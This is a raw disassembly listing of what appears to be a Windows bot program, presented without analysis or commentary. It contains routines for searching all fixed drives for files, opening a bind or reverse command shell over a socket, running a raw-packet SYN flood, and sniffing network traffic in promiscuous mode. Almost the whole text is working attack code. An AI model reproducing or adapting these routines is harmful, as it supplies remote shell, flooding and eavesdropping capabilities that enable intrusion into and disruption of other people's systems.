; ---------------------------------------------------------------------------
db 0EBh
db 1Fh
; ---------------------------------------------------------------------------
loc_403EA5: ; CODE XREF: sub_403E5B+41�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_403EC0
mov eax, [ebp+arg_4]
inc eax
push eax
push [ebp+arg_0]
call sub_403E5B
jmp short loc_403F1A
; ---------------------------------------------------------------------------
dw 4EBh
; ---------------------------------------------------------------------------
loc_403EC0: ; CODE XREF: sub_403E5B+52�j
xor eax, eax
jmp short loc_403F1A
; ---------------------------------------------------------------------------
loc_403EC4: ; CODE XREF: sub_403E5B+1D�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_403ED4
xor eax, eax
jmp short loc_403F1A
; ---------------------------------------------------------------------------
dw 11EBh
; ---------------------------------------------------------------------------
loc_403ED4: ; CODE XREF: sub_403E5B+71�j
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_403E5B
jmp short loc_403F1A
; ---------------------------------------------------------------------------
loc_403EE5: ; CODE XREF: sub_403E5B+1F�j
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax]
push eax
call dword_4010F0 ; CharUpperA
mov esi, eax
mov eax, [ebp+arg_4]
movzx eax, byte ptr [eax]
push eax
call dword_4010F0 ; CharUpperA
cmp esi, eax
jnz short loc_403F18
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_403E5B
jmp short loc_403F1A
; ---------------------------------------------------------------------------
dw 2EBh
; ---------------------------------------------------------------------------
loc_403F18: ; CODE XREF: sub_403E5B+A8�j
xor eax, eax
loc_403F1A: ; CODE XREF: sub_403E5B+2C�j
; sub_403E5B+46�j ...
pop esi
leave
retn 8
sub_403E5B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403F1F proc near ; CODE XREF: sub_403062+450�p
var_318 = byte ptr -318h
var_314 = byte ptr -314h
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_208 = byte ptr -208h
var_108 = dword ptr -108h
var_104 = byte ptr -104h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 108h
and [ebp+var_108], 0
push 104h
push [ebp+arg_0]
lea eax, [ebp+var_104]
push eax
call dword_4010BC ; lstrcpynA
push 0
push 0
lea eax, [ebp+var_108]
push eax
push offset loc_403F79
push 0
push 0
call dword_4010B4 ; CreateThread
test eax, eax
jz short locret_403F75
loc_403F62: ; CODE XREF: sub_403F1F+54�j
cmp [ebp+var_108], 0
jnz short locret_403F75
push 8
call dword_4010DC ; Sleep
jmp short loc_403F62
; ---------------------------------------------------------------------------
locret_403F75: ; CODE XREF: sub_403F1F+41�j
; sub_403F1F+4A�j
leave
retn 4
; ---------------------------------------------------------------------------
loc_403F79: ; DATA XREF: sub_403F1F+30�o
push ebp
mov ebp, esp
sub esp, 318h
push 108h
push [ebp+arg_0]
lea eax, [ebp+var_318]
push eax
call sub_40392B
mov eax, [ebp+arg_0]
mov dword ptr [eax], 1
lea eax, [ebp+var_208]
push eax
push 200h
call dword_401078 ; GetLogicalDriveStringsA
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_403FC3
cmp [ebp+var_4], 200h
jbe short loc_403FC7
loc_403FC3: ; CODE XREF: sub_403F1F+99�j
xor eax, eax
jmp short locret_40402F
; ---------------------------------------------------------------------------
loc_403FC7: ; CODE XREF: sub_403F1F+A2�j
lea eax, [ebp+var_208]
mov [ebp+var_20C], eax
jmp short loc_403FF1
; ---------------------------------------------------------------------------
loc_403FD5: ; CODE XREF: sub_403F1F:loc_40402B�j
push [ebp+var_20C]
call dword_401074 ; lstrlenA
mov ecx, [ebp+var_20C]
lea eax, [ecx+eax+1]
mov [ebp+var_20C], eax
loc_403FF1: ; CODE XREF: sub_403F1F+B4�j
mov eax, [ebp+var_20C]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_40402D
push [ebp+var_20C]
call dword_4010D8 ; GetDriveTypeA
mov [ebp+var_210], eax
cmp [ebp+var_210], 3
jnz short loc_40402B
lea eax, [ebp+var_314]
push eax
push [ebp+var_20C]
call sub_404033
loc_40402B: ; CODE XREF: sub_403F1F+F8�j
jmp short loc_403FD5
; ---------------------------------------------------------------------------
loc_40402D: ; CODE XREF: sub_403F1F+DD�j
xor eax, eax
locret_40402F: ; CODE XREF: sub_403F1F+A6�j
leave
retn 4
sub_403F1F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404033 proc near ; CODE XREF: sub_403F1F+107�p
; sub_404033+AB�p
var_544 = dword ptr -544h
var_540 = dword ptr -540h
var_514 = byte ptr -514h
var_400 = byte ptr -400h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 544h
push [ebp+arg_0]
push offset a_256s ; "%.256s*"
lea eax, [ebp+var_200]
push eax
call dword_401104 ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_540]
push eax
lea eax, [ebp+var_200]
push eax
call dword_401084 ; FindFirstFileA
mov [ebp+var_544], eax
cmp [ebp+var_544], 0FFFFFFFFh
jnz short loc_40407C
jmp locret_40414B
; ---------------------------------------------------------------------------
loc_40407C: ; CODE XREF: sub_404033+42�j
; sub_404033+106�j
mov eax, [ebp+var_540]
and eax, 10h
jz short loc_4040E5
push offset a_ ; "."
lea eax, [ebp+var_514]
push eax
call dword_4010AC ; lstrcmpA
test eax, eax
jz short loc_4040B3
push offset a__ ; ".."
lea eax, [ebp+var_514]
push eax
call dword_4010AC ; lstrcmpA
test eax, eax
jnz short loc_4040B5
loc_4040B3: ; CODE XREF: sub_404033+68�j
jmp short loc_404124
; ---------------------------------------------------------------------------
loc_4040B5: ; CODE XREF: sub_404033+7E�j
lea eax, [ebp+var_514]
push eax
push [ebp+arg_0]
push offset a_256s_250s ; "%.256s%.250s\\"
lea eax, [ebp+var_200]
push eax
call dword_401104 ; wsprintfA
add esp, 10h
push [ebp+arg_4]
lea eax, [ebp+var_200]
push eax
call sub_404033
jmp short loc_404124
; ---------------------------------------------------------------------------
loc_4040E5: ; CODE XREF: sub_404033+52�j
lea eax, [ebp+var_514]
push eax
push [ebp+arg_4]
call sub_403E5B
cmp eax, 1
jnz short loc_404124
lea eax, [ebp+var_514]
push eax
push [ebp+arg_0]
push offset aFindfile_256s_ ; "[findfile] %.256s%.240s"
lea eax, [ebp+var_400]
push eax
call dword_401104 ; wsprintfA
add esp, 10h
lea eax, [ebp+var_400]
push eax
call sub_402C53
loc_404124: ; CODE XREF: sub_404033:loc_4040B3�j
; sub_404033+B0�j ...
lea eax, [ebp+var_540]
push eax
push [ebp+var_544]
call dword_401080 ; FindNextFileA
test eax, eax
jnz loc_40407C
push [ebp+var_544]
call dword_40107C ; FindClose
locret_40414B: ; CODE XREF: sub_404033+44�j
leave
retn 8
sub_404033 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40414F proc near ; CODE XREF: sub_403062+437�p
var_274 = dword ptr -274h
var_270 = word ptr -270h
var_26E = word ptr -26Eh
var_26C = dword ptr -26Ch
var_260 = dword ptr -260h
var_234 = dword ptr -234h
var_230 = word ptr -230h
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_214 = dword ptr -214h
var_210 = byte ptr -210h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 108h
and [ebp+var_108], 0
push 100h
push [ebp+arg_0]
lea eax, [ebp+var_104]
push eax
call dword_4010BC ; lstrcpynA
push 0
push 0
lea eax, [ebp+var_108]
push eax
push offset loc_4041A9
push 0
push 0
call dword_4010B4 ; CreateThread
test eax, eax
jz short locret_4041A5
loc_404192: ; CODE XREF: sub_40414F+54�j
cmp [ebp+var_108], 0
jnz short locret_4041A5
push 8
call dword_4010DC ; Sleep
jmp short loc_404192
; ---------------------------------------------------------------------------
locret_4041A5: ; CODE XREF: sub_40414F+41�j
; sub_40414F+4A�j
leave
retn 4
; ---------------------------------------------------------------------------
loc_4041A9: ; DATA XREF: sub_40414F+30�o
push ebp
mov ebp, esp
sub esp, 274h
push 100h
mov eax, [ebp+arg_0]
add eax, 4
push eax
lea eax, [ebp+var_108]
push eax
call dword_4010BC ; lstrcpynA
mov eax, [ebp+arg_0]
mov dword ptr [eax], 1
push 3Ah
lea eax, [ebp+var_108]
push eax
call sub_40395A
mov [ebp+var_214], eax
cmp [ebp+var_214], 0
jnz short loc_4041F8
xor eax, eax
jmp locret_4043B0
; ---------------------------------------------------------------------------
loc_4041F8: ; CODE XREF: sub_40414F+A0�j
mov eax, [ebp+var_214]
mov byte ptr [eax], 0
mov eax, [ebp+var_214]
inc eax
mov [ebp+var_214], eax
and word ptr [ebp+var_4], 0
jmp short loc_404222
; ---------------------------------------------------------------------------
loc_404215: ; CODE XREF: sub_40414F+104�j
mov eax, [ebp+var_214]
inc eax
mov [ebp+var_214], eax
loc_404222: ; CODE XREF: sub_40414F+C4�j
mov eax, [ebp+var_214]
movzx eax, byte ptr [eax]
test eax, eax
jz short loc_404255
movzx eax, word ptr [ebp+var_4]
imul eax, 0Ah
mov word ptr [ebp+var_4], ax
mov eax, [ebp+var_214]
movzx eax, byte ptr [eax]
sub eax, 30h
movzx eax, ax
movzx ecx, word ptr [ebp+var_4]
add ecx, eax
mov word ptr [ebp+var_4], cx
jmp short loc_404215
; ---------------------------------------------------------------------------
loc_404255: ; CODE XREF: sub_40414F+DE�j
lea eax, [ebp+var_108]
push eax
call dword_40111C ; inet_addr
mov [ebp+var_26C], eax
push [ebp+var_4]
call dword_40110C ; ntohs
mov [ebp+var_26E], ax
mov [ebp+var_270], 2
cmp [ebp+var_26C], 0
jnz short loc_4042E9
push 0
push 0
push 0
push 6
push 1
push 2
call dword_401124 ; WSASocketA
mov [ebp+var_274], eax
push 10h
lea eax, [ebp+var_270]
push eax
push [ebp+var_274]
call dword_401148 ; bind
push 0
push [ebp+var_274]
call dword_40114C ; listen
push 0
push 0
push [ebp+var_274]
call dword_401150 ; accept
mov [ebp+var_10C], eax
push [ebp+var_274]
call dword_401140 ; closesocket
jmp short loc_404316
; ---------------------------------------------------------------------------
loc_4042E9: ; CODE XREF: sub_40414F+139�j
push 0
push 0
push 0
push 6
push 1
push 2
call dword_401124 ; WSASocketA
mov [ebp+var_10C], eax
push 10h
lea eax, [ebp+var_270]
push eax
push [ebp+var_10C]
call dword_40112C ; connect
loc_404316: ; CODE XREF: sub_40414F+198�j
push 44h
lea eax, [ebp+var_260]
push eax
call sub_4038D9
mov [ebp+var_260], 44h
mov [ebp+var_234], 181h
and [ebp+var_230], 0
mov eax, [ebp+var_10C]
mov [ebp+var_224], eax
mov eax, [ebp+var_224]
mov [ebp+var_228], eax
mov eax, [ebp+var_228]
mov [ebp+var_220], eax
push 100h
lea eax, [ebp+var_210]
push eax
push offset aComspecQ ; "\"%comspec%\" /Q"
call dword_401088 ; ExpandEnvironmentStringsA
push offset dword_4015F0
lea eax, [ebp+var_260]
push eax
push 0
push 0
push 10h
push 1
push 0
push 0
lea eax, [ebp+var_210]
push eax
push 0
call dword_4010A8 ; CreateProcessA
push [ebp+var_10C]
call dword_401140 ; closesocket
xor eax, eax
locret_4043B0: ; CODE XREF: sub_40414F+A4�j
leave
retn 4
sub_40414F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4043B4 proc near ; CODE XREF: sub_403062+36D�p
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_C = word ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
push 20h
push [ebp+arg_0]
call sub_40395A
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4043D2
jmp locret_4044BC
; ---------------------------------------------------------------------------
loc_4043D2: ; CODE XREF: sub_4043B4+17�j
mov eax, [ebp+var_4]
mov byte ptr [eax], 0
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
push 20h
push [ebp+arg_0]
lea eax, [ebp+var_2C]
push eax
call dword_4010BC ; lstrcpynA
push 20h
push [ebp+var_4]
call sub_40395A
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_404406
jmp locret_4044BC
; ---------------------------------------------------------------------------
loc_404406: ; CODE XREF: sub_4043B4+4B�j
mov eax, [ebp+var_8]
mov byte ptr [eax], 0
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
and [ebp+var_C], 0
jmp short loc_404421
; ---------------------------------------------------------------------------
loc_40441A: ; CODE XREF: sub_4043B4+98�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_404421: ; CODE XREF: sub_4043B4+64�j
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_40444E
movzx eax, [ebp+var_C]
imul eax, 0Ah
mov [ebp+var_C], ax
mov eax, [ebp+var_4]
movzx eax, byte ptr [eax]
sub eax, 30h
movzx eax, ax
movzx ecx, [ebp+var_C]
add ecx, eax
mov [ebp+var_C], cx
jmp short loc_40441A
; ---------------------------------------------------------------------------
loc_40444E: ; CODE XREF: sub_4043B4+75�j
and [ebp+var_30], 0
jmp short loc_40445B
; ---------------------------------------------------------------------------
loc_404454: ; CODE XREF: sub_4043B4+CA�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_40445B: ; CODE XREF: sub_4043B4+9E�j
mov eax, [ebp+var_8]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_404480
mov eax, [ebp+var_30]
imul eax, 0Ah
mov [ebp+var_30], eax
mov eax, [ebp+var_8]
movzx eax, byte ptr [eax]
mov ecx, [ebp+var_30]
lea eax, [ecx+eax-30h]
mov [ebp+var_30], eax
jmp short loc_404454
; ---------------------------------------------------------------------------
loc_404480: ; CODE XREF: sub_4043B4+AF�j
mov eax, [ebp+arg_4]
mov [ebp+var_34], eax
and [ebp+var_38], 0
and dword_4014CC, 0
push 0
push 0
lea eax, [ebp+var_38]
push eax
push offset loc_4044CF
push 0
push 0
call dword_4010B4 ; CreateThread
test eax, eax
jz short locret_4044BC
loc_4044AC: ; CODE XREF: sub_4043B4+106�j
cmp [ebp+var_38], 0
jnz short locret_4044BC
push 8
call dword_4010DC ; Sleep
jmp short loc_4044AC
; ---------------------------------------------------------------------------
locret_4044BC: ; CODE XREF: sub_4043B4+19�j
; sub_4043B4+4D�j ...
leave
retn 8
sub_4043B4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4044C0 proc near ; CODE XREF: sub_403062:loc_4033D9�p
push ebp
mov ebp, esp
mov dword_4014CC, 1
pop ebp
retn
sub_4044C0 endp
; ---------------------------------------------------------------------------
loc_4044CF: ; DATA XREF: sub_4043B4+E5�o
push ebp
mov ebp, esp
sub esp, 308h
push esi
push edi
mov esi, [ebp+8]
push 0Bh
pop ecx
lea edi, [ebp-2A4h]
rep movsd
movsw
mov eax, [ebp+8]
mov dword ptr [eax], 1
push 0FFh
push 3
push 2
call dword_401160 ; socket
mov [ebp-44h], eax
cmp dword ptr [ebp-44h], 0FFFFFFFFh
jnz short loc_404512
xor eax, eax
jmp loc_404862
; ---------------------------------------------------------------------------
loc_404512: ; CODE XREF: MEW:00404509�j
mov dword ptr [ebp-2ACh], 1
push 4
lea eax, [ebp-2ACh]
push eax
push 2
push 0
push dword ptr [ebp-44h]
call dword_401128 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_40453E
xor eax, eax
jmp loc_404862
; ---------------------------------------------------------------------------
loc_40453E: ; CODE XREF: MEW:00404535�j
lea eax, [ebp-298h]
push eax
call dword_40111C ; inet_addr
mov [ebp-8], eax
mov word ptr [ebp-18h], 2
and word ptr [ebp-16h], 0
mov eax, [ebp-8]
mov [ebp-14h], eax
mov dword ptr [ebp-4], 10h
lea eax, [ebp-4]
push eax
lea eax, [ebp-260h]
push eax
push dword_4014DC
call dword_401134 ; getsockname
cmp eax, 0FFFFFFFFh
jnz short loc_404589
xor eax, eax
jmp loc_404862
; ---------------------------------------------------------------------------
loc_404589: ; CODE XREF: MEW:00404580�j
call dword_4010A4 ; GetTickCount
and eax, 0FFh
shl eax, 18h
xor eax, [ebp-25Ch]
mov [ebp-1Ch], eax
mov byte ptr [ebp-40h], 45h
mov word ptr [ebp-3Eh], 2800h
mov word ptr [ebp-3Ch], 1
and word ptr [ebp-3Ah], 0
mov byte ptr [ebp-38h], 80h
mov byte ptr [ebp-37h], 6
and word ptr [ebp-36h], 0
call dword_4010A4 ; GetTickCount
xor eax, 95EC27A5h
mov [ebp-270h], eax
and dword ptr [ebp-26Ch], 0
mov byte ptr [ebp-267h], 2
mov byte ptr [ebp-268h], 50h
mov word ptr [ebp-266h], 2
and word ptr [ebp-262h], 0
and word ptr [ebp-264h], 0
mov byte ptr [ebp-24h], 0
mov byte ptr [ebp-23h], 6
mov word ptr [ebp-22h], 1400h
mov eax, [ebp-8]
mov [ebp-30h], eax
mov eax, [ebp-8]
mov [ebp-28h], eax
mov eax, [ebp-1Ch]
mov [ebp-34h], eax
mov eax, [ebp-1Ch]
mov [ebp-2Ch], eax
movzx eax, word ptr [ebp-278h]
test eax, eax
jnz short loc_404646
call dword_4010A4 ; GetTickCount
and eax, 0FFFFh
mov [ebp-272h], ax
jmp short loc_404659
; ---------------------------------------------------------------------------
loc_404646: ; CODE XREF: MEW:00404630�j
push dword ptr [ebp-278h]
call dword_40110C ; ntohs
mov [ebp-272h], ax
loc_404659: ; CODE XREF: MEW:00404644�j
call dword_4010A4 ; GetTickCount
and eax, 0FFFFh
xor eax, 82E4h
mov [ebp-274h], ax
push 0Ch
lea eax, [ebp-2Ch]
push eax
lea eax, [ebp-2E8h]
push eax
call sub_40392B
push 14h
lea eax, [ebp-274h]
push eax
lea eax, [ebp-2DCh]
push eax
call sub_40392B
push 20h
lea eax, [ebp-2E8h]
push eax
call sub_404868
mov [ebp-2CCh], ax
push 14h
lea eax, [ebp-40h]
push eax
lea eax, [ebp-2F0h]
push eax
call sub_40392B
push 28h
lea eax, [ebp-2F0h]
push eax
call sub_404868
mov [ebp-2E6h], ax
mov dword ptr [ebp-48h], 1
call dword_4010A4 ; GetTickCount
mov [ebp-250h], eax
mov eax, [ebp-29Ch]
imul eax, 3E8h
add eax, [ebp-250h]
mov [ebp-24Ch], eax
push 10h
lea eax, [ebp-18h]
push eax
push 0
push 28h
lea eax, [ebp-2F0h]
push eax
push dword ptr [ebp-44h]
call dword_401110 ; sendto
cmp eax, 0FFFFFFFFh
jnz short loc_404724
xor eax, eax
jmp loc_404862
; ---------------------------------------------------------------------------
loc_404724: ; CODE XREF: MEW:0040471B�j
; MEW:004047AC�j
call dword_4010A4 ; GetTickCount
cmp eax, [ebp-24Ch]
jnb short loc_4047B1
cmp dword_4014CC, 0
jnz short loc_4047B1
push 10h
lea eax, [ebp-18h]
push eax
push 0
push 28h
lea eax, [ebp-2F0h]
push eax
push dword ptr [ebp-44h]
call dword_401110 ; sendto
push 10h
lea eax, [ebp-18h]
push eax
push 0
push 28h
lea eax, [ebp-2F0h]
push eax
push dword ptr [ebp-44h]
call dword_401110 ; sendto
push 10h
lea eax, [ebp-18h]
push eax
push 0
push 28h
lea eax, [ebp-2F0h]
push eax
push dword ptr [ebp-44h]
call dword_401110 ; sendto
push 10h
lea eax, [ebp-18h]
push eax
push 0
push 28h
lea eax, [ebp-2F0h]
push eax
push dword ptr [ebp-44h]
call dword_401110 ; sendto
mov eax, [ebp-48h]
add eax, 4
mov [ebp-48h], eax
jmp loc_404724
; ---------------------------------------------------------------------------
loc_4047B1: ; CODE XREF: MEW:00404730�j
; MEW:00404739�j
call dword_4010A4 ; GetTickCount
sub eax, [ebp-250h]
mov [ebp-2A8h], eax
push dword ptr [ebp-44h]
call dword_401140 ; closesocket
cmp dword ptr [ebp-2A0h], 0
jnz loc_404860
mov eax, [ebp-48h]
imul eax, 28h
mov [ebp-20h], eax
mov eax, [ebp-20h]
shr eax, 0Ah
mov [ebp-2F8h], eax
and dword ptr [ebp-2F4h], 0
fild qword ptr [ebp-2F8h]
mov eax, [ebp-2A8h]
mov [ebp-300h], eax
and dword ptr [ebp-2FCh], 0
fild qword ptr [ebp-300h]
fdivp st(1), st
fmul dbl_401B88
fistp qword ptr [ebp-308h]
push dword ptr [ebp-308h]
mov eax, [ebp-20h]
shr eax, 14h
push eax
push dword ptr [ebp-48h]
push dword ptr [ebp-2A8h]
lea eax, [ebp-298h]
push eax
push offset aSyn_16sDoneUms ; "[syn:%.16s] done [%ums] [%u packets] [%"...
lea eax, [ebp-248h]
push eax
call dword_401104 ; wsprintfA
add esp, 1Ch
lea eax, [ebp-248h]
push eax
call sub_402C53
loc_404860: ; CODE XREF: MEW:004047D3�j
xor eax, eax
loc_404862: ; CODE XREF: MEW:0040450D�j
; MEW:00404539�j ...
pop edi
pop esi
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404868 proc near ; CODE XREF: MEW:004046A0�p
; MEW:004046C7�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
loc_404870: ; CODE XREF: sub_404868+2A�j
cmp [ebp+arg_4], 2
jb short loc_404894
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax]
add eax, [ebp+var_4]
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+arg_4]
dec eax
dec eax
mov [ebp+arg_4], eax
jmp short loc_404870
; ---------------------------------------------------------------------------
loc_404894: ; CODE XREF: sub_404868+C�j
cmp [ebp+arg_4], 0
jz short loc_4048A6
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax]
add eax, [ebp+var_4]
mov [ebp+var_4], eax
loc_4048A6: ; CODE XREF: sub_404868+30�j
mov eax, [ebp+var_4]
shr eax, 10h
mov ecx, [ebp+var_4]
and ecx, 0FFFFh
add eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shr eax, 10h
add eax, [ebp+var_4]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
not eax
leave
retn 8
sub_404868 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4048CF proc near ; CODE XREF: sub_403062:loc_4033A6�p
push ebp
mov ebp, esp
cmp dword_401688, 1
jnz short loc_4048F7
and dword_401688, 0
push 0
push 0
push 0
push offset loc_404908
push 0
push 0
call dword_4010B4 ; CreateThread
loc_4048F7: ; CODE XREF: sub_4048CF+A�j
pop ebp
retn
sub_4048CF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4048F9 proc near ; CODE XREF: sub_403062:loc_4033B0�p
push ebp
mov ebp, esp
mov dword_401688, 1
pop ebp
retn
sub_4048F9 endp
; ---------------------------------------------------------------------------
loc_404908: ; DATA XREF: sub_4048CF+19�o
push ebp
mov ebp, esp
sub esp, 1F8h
mov dword ptr [ebp-10h], 10h
lea eax, [ebp-10h]
push eax
lea eax, [ebp-1F8h]
push eax
push dword_4014DC
call dword_401134 ; getsockname
cmp eax, 0FFFFFFFFh
jnz short loc_40493B
xor eax, eax
jmp locret_404C4D
; ---------------------------------------------------------------------------
loc_40493B: ; CODE XREF: MEW:00404932�j
and word ptr [ebp-1F6h], 0
push 0
push 3
push 2
call dword_401160 ; socket
mov [ebp-38h], eax
cmp dword ptr [ebp-38h], 0FFFFFFFFh
jnz short loc_40495F
xor eax, eax
jmp locret_404C4D
; ---------------------------------------------------------------------------
loc_40495F: ; CODE XREF: MEW:00404956�j
push 10h
lea eax, [ebp-1F8h]
push eax
push dword ptr [ebp-38h]
call dword_401148 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_404986
push dword ptr [ebp-38h]
call dword_401140 ; closesocket
xor eax, eax
jmp locret_404C4D
; ---------------------------------------------------------------------------
loc_404986: ; CODE XREF: MEW:00404974�j
mov dword ptr [ebp-14h], 1
push 0
push 0
lea eax, [ebp-44h]
push eax
push 0
push 0
push 4
lea eax, [ebp-14h]
push eax
push 98000001h
push dword ptr [ebp-38h]
call dword_401118 ; WSAIoctl
cmp eax, 0FFFFFFFFh
jnz short loc_4049C2
push dword ptr [ebp-38h]
call dword_401140 ; closesocket
xor eax, eax
jmp locret_404C4D
; ---------------------------------------------------------------------------
loc_4049C2: ; CODE XREF: MEW:004049B0�j
push 10000h
push 0
call dword_401090 ; GlobalAlloc
mov [ebp-48h], eax
mov eax, [ebp-48h]
mov [ebp-34h], eax
loc_4049D8: ; CODE XREF: MEW:004049FD�j
; MEW:00404A0B�j ...
cmp dword_401688, 0
jnz loc_404C42
push 0
push 10000h
push dword ptr [ebp-48h]
push dword ptr [ebp-38h]
call dword_40113C ; recv
cmp eax, 0FFFFFFFFh
jnz short loc_4049FF
jmp short loc_4049D8
; ---------------------------------------------------------------------------
loc_4049FF: ; CODE XREF: MEW:004049FB�j
mov eax, [ebp-34h]
movzx eax, byte ptr [eax+9]
cmp eax, 6
jz short loc_404A0D
jmp short loc_4049D8
; ---------------------------------------------------------------------------
loc_404A0D: ; CODE XREF: MEW:00404A09�j
mov eax, [ebp-34h]
movzx eax, byte ptr [eax]
and eax, 0Fh
shl eax, 2
mov [ebp-40h], eax
cmp dword ptr [ebp-40h], 3Ch
jbe short loc_404A24
jmp short loc_4049D8
; ---------------------------------------------------------------------------
loc_404A24: ; CODE XREF: MEW:00404A20�j
mov eax, [ebp-34h]
mov ax, [eax+2]
push eax
call dword_401114 ; ntohs
movzx eax, ax
mov [ebp-4Ch], eax
mov eax, [ebp-48h]
add eax, [ebp-40h]
mov [ebp-60h], eax
mov eax, [ebp-60h]
movzx eax, byte ptr [eax+0Ch]
sar eax, 4
shl eax, 2
mov [ebp-30h], eax
mov eax, [ebp-40h]
add eax, [ebp-30h]
mov [ebp-8], eax
mov eax, [ebp-8]
cmp eax, [ebp-4Ch]
jb short loc_404A67
jmp loc_4049D8
; ---------------------------------------------------------------------------
loc_404A67: ; CODE XREF: MEW:00404A60�j
mov eax, [ebp-4Ch]
sub eax, [ebp-8]
mov [ebp-3Ch], eax
mov eax, [ebp-60h]
mov ax, [eax]
push eax
call dword_401114 ; ntohs
mov [ebp-4], ax
mov eax, [ebp-60h]
mov ax, [eax+2]
push eax
call dword_401114 ; ntohs
mov [ebp-28h], ax
movzx eax, word ptr [ebp-4]
cmp eax, 50h
jz short loc_404ADF
movzx eax, word ptr [ebp-28h]
cmp eax, 50h
jz short loc_404ADF
movzx eax, word ptr [ebp-4]
cmp eax, 19h
jz short loc_404ADF
movzx eax, word ptr [ebp-28h]
cmp eax, 19h
jz short loc_404ADF
movzx eax, word ptr [ebp-4]
cmp eax, 6Eh
jz short loc_404ADF
movzx eax, word ptr [ebp-28h]
cmp eax, 6Eh
jz short loc_404ADF
movzx eax, word ptr [ebp-4]
cmp eax, 8Bh
jz short loc_404ADF
movzx eax, word ptr [ebp-28h]
cmp eax, 8Bh
jnz short loc_404AE4
loc_404ADF: ; CODE XREF: MEW:00404A9A�j
; MEW:00404AA3�j ...
jmp loc_4049D8
; ---------------------------------------------------------------------------
loc_404AE4: ; CODE XREF: MEW:00404ADD�j
mov eax, [ebp-48h]
add eax, [ebp-8]
mov [ebp-1E8h], eax
mov eax, [ebp-1E8h]
add eax, [ebp-3Ch]
mov byte ptr [eax], 0
and dword ptr [ebp-1E4h], 0
and dword ptr [ebp-2Ch], 0
jmp short loc_404B10
; ---------------------------------------------------------------------------
loc_404B09: ; CODE XREF: MEW:loc_404B75�j
mov eax, [ebp-2Ch]
inc eax
mov [ebp-2Ch], eax
loc_404B10: ; CODE XREF: MEW:00404B07�j
mov eax, [ebp-2Ch]
cmp eax, [ebp-3Ch]
jnb short loc_404B77
mov eax, [ebp-1E8h]
add eax, [ebp-2Ch]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_404B39
mov eax, [ebp-1E8h]
add eax, [ebp-2Ch]
movsx eax, byte ptr [eax]
cmp eax, 7Fh
jle short loc_404B47
loc_404B39: ; CODE XREF: MEW:00404B26�j
mov dword ptr [ebp-1E4h], 1
jmp short loc_404B77
; ---------------------------------------------------------------------------
db 0EBh, 2Eh
; ---------------------------------------------------------------------------
loc_404B47: ; CODE XREF: MEW:00404B37�j
mov eax, [ebp-1E8h]
add eax, [ebp-2Ch]
movsx eax, byte ptr [eax]
cmp eax, 0Dh
jz short loc_404B69
mov eax, [ebp-1E8h]
add eax, [ebp-2Ch]
movsx eax, byte ptr [eax]
cmp eax, 0Ah
jnz short loc_404B75
loc_404B69: ; CODE XREF: MEW:00404B56�j
mov eax, [ebp-1E8h]
add eax, [ebp-2Ch]
mov byte ptr [eax], 20h
loc_404B75: ; CODE XREF: MEW:00404B67�j
jmp short loc_404B09
; ---------------------------------------------------------------------------
loc_404B77: ; CODE XREF: MEW:00404B16�j
; MEW:00404B43�j
cmp dword ptr [ebp-1E4h], 1
jnz short loc_404B85
jmp loc_4049D8
; ---------------------------------------------------------------------------
loc_404B85: ; CODE XREF: MEW:00404B7E�j
push offset dword_4016F8
push dword ptr [ebp-1E8h]
call sub_40398B
test eax, eax
jz short loc_404B9E
jmp loc_4049D8
; ---------------------------------------------------------------------------
loc_404B9E: ; CODE XREF: MEW:00404B97�j
push dword ptr [ebp-1E8h]
call sub_404C51
